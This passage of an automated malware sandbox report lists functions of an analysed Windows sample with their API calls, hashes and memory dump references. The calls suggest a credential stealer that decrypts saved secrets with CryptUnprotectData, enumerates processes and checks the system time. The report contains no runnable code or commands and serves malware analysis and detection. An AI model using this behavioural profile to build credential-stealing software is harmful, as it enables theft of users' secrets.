                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      • Opcode ID: 0b05c2e848de50acfa32129847e5168629126a946e18eb84d60770ad244af5fe
                                      • Instruction ID: 9cbdb5705e31089d0eebacde9836701f9c1ec3f23c33951cfbbb0998b8eeb533
                                      • Opcode Fuzzy Hash: 0b05c2e848de50acfa32129847e5168629126a946e18eb84d60770ad244af5fe
                                      • Instruction Fuzzy Hash: 4D41607590431AEBDB10CFA4DD89BEEBBB8BF44304F1045A8E509A72C0D7B46A84CF95
                                      Function 00536920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 0053696C
                                      • sscanf.NTDLL ref: 00536999
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005369B2
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005369C0
                                      • ExitProcess.KERNEL32 ref: 005369DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: 9cbac16cde4e82330ea2497c669873e169902d98604af3b416a0bc1d92d7ca1f
                                      • Instruction ID: 0cd93f196a6bb38acf4db15e42cb3b73e034da011c5579ac488907ff793d22b1
                                      • Opcode Fuzzy Hash: 9cbac16cde4e82330ea2497c669873e169902d98604af3b416a0bc1d92d7ca1f
                                      • Instruction Fuzzy Hash: B221CB76D14209ABCF04EFE4D945AEEBBB5BF48300F04852EE506F3250EB749605CBA9
                                      Function 00527240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0052724D
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00527254
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00527281
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005272A4
                                      • LocalFree.KERNEL32(?), ref: 005272AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: 4f15186b6a51a32c2d75759d1129bb19f1a8187107a560fc506914493202ee2f
                                      • Instruction ID: 6e0eb203b8896929a74a4a72f45879dc374ad489fa45a1c274c3314e50b3ac7e
                                      • Opcode Fuzzy Hash: 4f15186b6a51a32c2d75759d1129bb19f1a8187107a560fc506914493202ee2f
                                      • Instruction Fuzzy Hash: 2B010075A40308BBDB10DFD4DD45F9D77B8BB44704F108558FB06BB2C0D6B4AA008B69
                                      Function 00539600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0053961E
                                      • Process32First.KERNEL32(00540ACA,00000128), ref: 00539632
                                      • Process32Next.KERNEL32(00540ACA,00000128), ref: 00539647
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0053965C
                                      • CloseHandle.KERNEL32(00540ACA), ref: 0053967A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: be44a45e23ae87963945b8a6cf96d588aacbf74d3c79f47b474dc5041d9b8b73
                                      • Instruction ID: 3a425a8ff483956c1958d862a9acdf93708f740243d8337268a48519086c141a
                                      • Opcode Fuzzy Hash: be44a45e23ae87963945b8a6cf96d588aacbf74d3c79f47b474dc5041d9b8b73
                                      • Instruction Fuzzy Hash: 2301E9B5A01208ABCB15DFA5C949BEDBBF8FB48300F108198E90AA7250D7B4AA44DF51
                                      Function 00538EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00525184,40000001,00000000,00000000,?,00525184), ref: 00538EC0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 96e18545ac29e53934e9f32bd87ddbe67c63cceb366ecffaea64fa7047a12d43
                                      • Instruction ID: 246e17524bdc9e3b4191852c3819754199c085cbdde72df8c409793f71a41546
                                      • Opcode Fuzzy Hash: 96e18545ac29e53934e9f32bd87ddbe67c63cceb366ecffaea64fa7047a12d43
                                      • Instruction Fuzzy Hash: 27110674200309BFDB08CF64D884FBA3BA9BF89300F109958F91A8B250DB75E941DB64
                                      Function 00537A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00F1E230,00000000,?,00540E10,00000000,?,00000000,00000000), ref: 00537A63
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00537A6A
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00F1E230,00000000,?,00540E10,00000000,?,00000000,00000000,?), ref: 00537A7D
                                      • wsprintfA.USER32 ref: 00537AB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: d088702ca7d302e78d538ba8090180e76af1e570102e993b9934d08ad979eb82
                                      • Instruction ID: 3d0aa0d8190da868bb9d024157b3dea37e44fb5126bda64636e32dc6d955070a
                                      • Opcode Fuzzy Hash: d088702ca7d302e78d538ba8090180e76af1e570102e993b9934d08ad979eb82
                                      • Instruction Fuzzy Hash: 45115EB1D45218EBEB208B54DC49FA9BB78FB44721F10479AE91AA32C0D7785A40CF55
                                      Function 008F1724 Relevance: 5.7, Strings: 4, Instructions: 705COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 6T5$;E3y$;E3y$U8wW
                                      • API String ID: 0-3404926838
                                      • Opcode ID: 8058474ec1ce7c49e85bc6d7c14af39c7a1a451cadfe397b84ab1e271580ba63
                                      • Instruction ID: 56a1b1e31ac6269ed58f95f3686d05aeccd67e06f515ea3dcd41d35a9549212b
                                      • Opcode Fuzzy Hash: 8058474ec1ce7c49e85bc6d7c14af39c7a1a451cadfe397b84ab1e271580ba63
                                      • Instruction Fuzzy Hash: 9B2218B3608304AFE3046E29EC8567AFBE9EFD4720F1A893DE6C583744E63558418797
                                      Function 00533720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.COMBASE(0053E118,00000000,00000001,0053E108,00000000), ref: 00533758
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005337B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      • Opcode ID: 22d97db9422d4450d1141ce61c2b94224c9800bf7b5820c8fa0c4dcd30f926c0
                                      • Instruction ID: 28ebdba260c2c14c33d24dab5e6cba0dfb7c9531d6a26e27adfa75683d264fcb
                                      • Opcode Fuzzy Hash: 22d97db9422d4450d1141ce61c2b94224c9800bf7b5820c8fa0c4dcd30f926c0
                                      • Instruction Fuzzy Hash: D441C971A40A189FDB24DB58CC95F9BB7B5BB48702F4081D8E609A72D0E7B16E85CF50
                                      Function 00529B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00529B84
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00529BA3
                                      • LocalFree.KERNEL32(?), ref: 00529BD3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      • Opcode ID: 2ddd73496c080bb16c737f0d59c7126f9ecd676965c880c83260e22712b941f9
                                      • Instruction ID: b5aaa5593582bbe0c0fc79eb64ef7a18e21db75315931fa92ad0572f7f74143f
                                      • Opcode Fuzzy Hash: 2ddd73496c080bb16c737f0d59c7126f9ecd676965c880c83260e22712b941f9
                                      • Instruction Fuzzy Hash: 5211BAB5A00209EFDB04DFA4D985AAE77B5FF89300F108568E915A7390D774AE10CFA1
                                      Function 008F6A3C Relevance: .5, Instructions: 548COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: daf516360c5efd95761e9da725b754fb6fc3e7c42feeb284b6615bc0c5ea61d7
                                      • Instruction ID: 1562b2c5f23814f84dc142810cb94cc5eab442977b499f53f7660c1196ee70b8
                                      • Opcode Fuzzy Hash: daf516360c5efd95761e9da725b754fb6fc3e7c42feeb284b6615bc0c5ea61d7
                                      • Instruction Fuzzy Hash: 6C02D2B260C3049FD304AE2DEC8567AF7E9EF94720F16892DE6C5C3740EA7598418B97
                                      Function 00845C0E Relevance: .2, Instructions: 216COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e016ac3f1ffcc842ec64628bf994e6e48bfdae23128839ceecde48ea11176d31
                                      • Instruction ID: 6b4eea347bc871301658c7e54740b871ef5d2dc7381f6f943afe52dfe433ee6c
                                      • Opcode Fuzzy Hash: e016ac3f1ffcc842ec64628bf994e6e48bfdae23128839ceecde48ea11176d31
                                      • Instruction Fuzzy Hash: 3A61D7F3A086009FF7046E29DC4576AB7D5EB94320F27893DE7D883780E97958418796
                                      Function 008B9D55 Relevance: .2, Instructions: 209COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
